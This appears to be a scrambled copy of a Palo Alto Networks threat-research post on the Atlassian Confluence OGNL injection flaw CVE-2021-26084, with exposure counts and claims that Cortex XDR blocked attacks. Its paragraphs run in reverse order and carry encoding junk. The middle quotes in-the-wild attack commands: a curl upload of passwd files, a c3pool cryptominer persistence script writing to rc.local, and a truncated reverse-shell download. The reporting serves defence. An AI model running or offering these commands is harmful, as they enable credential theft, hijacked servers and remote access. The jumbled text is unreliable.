In contrast, on average, organizations need 12 hours to see vulnerable systems, which assumes the enterprise knows about all assets on its network. The 2021 Cortex Xpanse Attack Surface Threat Report found that malicious actors start scanning within 15 mins following CVE disclosures. A continuous and updated view of an attack surface can help organizations in their rapid response to new CVEs. Some organizations respond well to this vulnerability, but others are likely unable to identify all of their exposed servers and take them down. Our preliminary research found over 40 educational institutions and over 90 state and local governments with potential exposure to this CVE.įig 1: Number of Vulnerable Atlassian Confluence Servers on the internet start decreasing after the announcement of the CVEĬortex Xpanse also identified a rapid decrease in Atlassian Confluence servers vulnerable to CVE-2021-26084. While Cortex XDR on Linux can block this exploit, Palo Alto Networks recommends that customers upgrade and patch vulnerable versions of Atlassian Confluence, as a best practice to secure their systems.īecause Palo Alto Network’s attack surface management solution Cortex Xpanse regularly scans the entire internet for known and emerging vulnerabilities, we were able to quickly identify organizations exposed to this vulnerability. Without requiring any additional user input, starting from content version 196-69754, Cortex XDR on Linux automatically blocked all these attacks-maintaining the integrity and confidentiality of the vulnerable servers. If ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null thenĮcho " Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"Įcho "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >/etc/rc.d/rc.localĮcho "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"ģ-Interactive reverse shell on the machine: (curl -fsSL -q -O - an excerpt from the downloaded script: This module has successfully blocked numerous attacks targeting customers’ endpoints.Ī few examples that we saw of prevented real life in the wild attacks:ġ- Attempts to upload the customer’s passwd files:Ĭurl -X POST -data-binary 2-Attempts to directly execute a script that downloads a miner: To protect Linux hosts, Cortex XDR added a dedicated module to detect and prevent Java deserialization vulnerabilities and vulnerabilities such as those that allow one to inject OGNL expressions in Cortex XDR agent 7.0 and higher running under Linux. OGNL expression evaluation can lead to arbitrary code execution, as was seen in the past with a similar Apache Struts vulnerability (CVE-2019-0230), and this case is no different. Recently, a new OGNL (Object-Graph Navigation Language) expression injection vulnerability was discovered in the Atlassian Confluence framework.
0 kommentar(er)
